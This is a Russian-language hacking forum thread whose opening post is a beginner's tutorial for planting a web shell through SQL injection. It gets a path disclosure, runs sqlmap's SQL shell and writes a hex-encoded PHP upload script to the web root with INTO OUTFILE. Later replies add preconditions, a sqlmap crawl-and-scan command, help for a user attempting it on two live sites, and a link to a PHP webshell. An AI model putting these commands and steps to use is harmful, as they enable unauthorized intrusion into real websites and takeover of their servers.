PDA

Просмотр полной версии : Загрузка Web Shell через SQLmap [for newbies]


Bezlishke
18.05.2015, 12:14
Доброго времени суток, друзья.

Я давно натыкался на статейку, сейчас уже не могу её найти. Но думаю вам будет интересно почитать.

Сразу говорю, статья не для пропентестеров, а для тех кто только начинает свой путь в этой сфере. Не судите строго...

Для начала нам понадобится:

1) PHPSHell

2) SQLmap

3) Скрипт на пхые (http://www.w3schools.com/php/php_file_upload.asp)Скрипт аплоада на Пых'е

=============================

Первым делом, после того как мы нашли уязвимость, нам надо получить FPD. Варинтов множество, но мне обычно подходит Array[] Parameter инъекция.


http://www.example.com/index.php?id[]=1


И получаем ожидаемое.


Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/relax/public_html/index.php on line 59


Далее нам нужно перевезти код "нашего" скрипта для аплоада в hex. На выхлопе мы получаем незатейливый кодец и стремительно запускаем скульмап. Для получения максимальной информации я стараюсь убить двух зайцев сразу, чего и вам советую. Помимо того, что мы хотим попасть в шелл SQL было бы славно познакомиться с базой.


python sqlmap.py --url=
http://www.example.com/index.php?id=1
--random-agent -f --dbs --tables --thrads 10 --sql-shell


Перед нашими глазами воспрянет:


[15:35:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5
[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>


Наша команда должна иметь вид:


SELECT 0xНаш_хекс_код INTO OUTFILE "Полный/путь/и_имя/файла.php";

Допустим мы назвали его upload.php, значит дико-бешено бежим на http://www.example.com/upload.php. Заливаем шелл и занимаемся его поиском. После чего можно логиниться на него и продолжать идти к намеченной цели.

===========

Работает это только на MySQL и только с file-priv "Y"

Статья написана в ознакомительных целях, только для расширения кругозора новичков. Автор не несёт ответственности на её использование.

faza02
18.05.2015, 12:22
забыли еще одно обязательное условие

Suicide
18.05.2015, 12:23
Не знаю.. Ник идентичный, но

https://exploit.in/forum/index.php?showtopic=86961 10.02.2015

Bezlishke
18.05.2015, 12:25
↑ (https://antichat.live/posts/3848851/)
Не знаю.. Ник идентичный, но
https://exploit.in/forum/index.php?showtopic=86961
10.02.2015


Так-то это я. Могу копипастить своё сколько угодно. Или же нет?

Suicide
18.05.2015, 12:29
↑ (https://antichat.live/posts/3848852/)
Так-то это я.
Могу копипастить своё сколько угодно. Или же нет?


Ну раз "я"..

Всё дело в знаниях, актуальности и востребованности.. мб и "могу", но с февраля уж столько прошло и потом вот это


↑ (https://antichat.live/posts/3848846/)
Работает это только на MySQL и только с file-priv "Y"


такое призрачное, но флаг в руки если кто-то воспользуется, но для начала откопает..

Bezlishke
18.05.2015, 12:31
↑ (https://antichat.live/posts/3848854/)
Всё дело в знаниях, актуальности и востребованности.. мб и "могу", но с февраля уж столько прошло и потом вот это




↑ (https://antichat.live/posts/3848846/)
Статья написана в ознакомительных целях, только для расширения кругозора новичков.




↑ (https://antichat.live/posts/3848854/)
такое призрачное, но флаг в руки если кто-то воспользуется, но для начала откопает..


Я до сих пор нахожу иногда

BabaDook
18.05.2015, 12:41
ну вообще кошмар. давно ещё на эксплоите видел, ужас, кошмар. Ужас. нет слов.

faza02
18.05.2015, 14:10
так вот еще одно обязательное условие: реальные кавычки в пути до файла. /threads/34338/ (https://antichat.live/threads/34338/)

Bezlishke
18.05.2015, 16:08
↑ (https://antichat.live/posts/3848890/)
так вот еще одно обязательное условие: реальные кавычки в пути до файла.
/threads/34338/ (https://antichat.live/threads/34338/)


Спасибо. Буду дома дополню

BabaDook
18.05.2015, 16:33
Наверное словосочетание sqlmap сканер, уже потеряло актуальность.

Однако sql не только инструмент для "раскрутки" уязвимости. Но он ещё реально сканер, да-да, сканер, и как вы догадались он находит sql уязвимые параметры в GET and POST запросах

Вот маленький пример

sqlmap --random-agent -u site.org --form --crawl=2 --batch

Где : --form "обработка" post данных альтернатива (--data )

--crawl=2

1pman
11.03.2016, 03:25
у меня вылазит


[WARNING] execution of custom SQL queries is only available when stacked queries are supported


при


sql-shell> select user from mysql.user where file_priv='Y'
[05:08:20] [INFO] fetching SQL SELECT statement query output: 'select user from mysql.user where file_priv='Y''
[05:08:20] [INFO] the SQL query used returns 2 entries
[05:08:20] [INFO] resumed: root
[05:08:20] [INFO] resumed: root
select user from mysql.user where file_priv='Y' [1]:
root

в чём может быть проблема?=( пытаюсь провернуть на 2 сайтах, везде одно и тоже

Bezlishke
17.03.2016, 16:04
↑ (https://antichat.live/posts/3961952/)
у меня вылазит
при

sql-shell> select user from mysql.user where file_priv='Y'
[05:08:20] [INFO] fetching SQL SELECT statement query output: 'select user from mysql.user where file_priv='Y''
[05:08:20] [INFO] the SQL query used returns 2 entries
[05:08:20] [INFO] resumed: root
[05:08:20] [INFO] resumed: root
select user from mysql.user where file_priv='Y' [1]:
root

в чём может быть проблема?=( пытаюсь провернуть на 2 сайтах, везде одно и тоже


Подробнее давай. может ты в команде ошибся.

BabaDook
17.03.2016, 18:19
sql-shell> select user from mysql.user where file_priv='Y' Тебя не смутило что у тебя уже шел?*

DarkCaT
18.03.2016, 14:39
↑ (https://antichat.live/posts/3964139/)
sql-shell> select user from mysql.user where file_priv='Y' Тебя не смутило что у тебя уже шел?*


А тебя не смущает что это всего лишь SQL-шел ? А человек просто пытается понять есть ли у него права на запись в файл.

BabaDook
18.03.2016, 15:20
↑ (https://antichat.live/posts/3964418/)
А тебя не смущает что это всего лишь SQL-шел ? А человек просто пытается понять есть ли у него права на запись в файл.


Неа, всё в порядке. просто если бы не было бы прав ему бы не дался бы такой интерфейс, так же можно ещё и через sql квери

I_I
26.03.2016, 13:37
Автору надо еще видос записать и будет само то

Добавлю от себя

PHP shell можно взять здесь https://github.com/HARDLINUX/webshell

Конечно все в ознакомительных целях

reds1993
26.03.2016, 14:08
↑ (https://antichat.live/posts/3967129/)
Автору надо еще видос записать и будет само то
Добавлю от себя
PHP shell можно взять здесь
https://github.com/HARDLINUX/webshell
Конечно все в ознакомительных целях


это что за хрень?

BabaDook
26.03.2016, 15:18
↑ (https://antichat.live/posts/3967135/)
Это PHP Webshell
Первый раз Webshell видишь?
Просто oRb забил и больше не делает WSO
Теперь каждый может улучшать его на github


oRb - сделал шедевр, теперь каждая 2я мразь плагиатит

reds1993
26.03.2016, 19:28
↑ (https://antichat.live/posts/3967135/)
Это PHP Webshell
Первый раз Webshell видишь?
Просто oRb забил и больше не делает WSO
Теперь каждый может улучшать его на github


На гитхабе таких улучшений тьматьмущая... одно хуже другого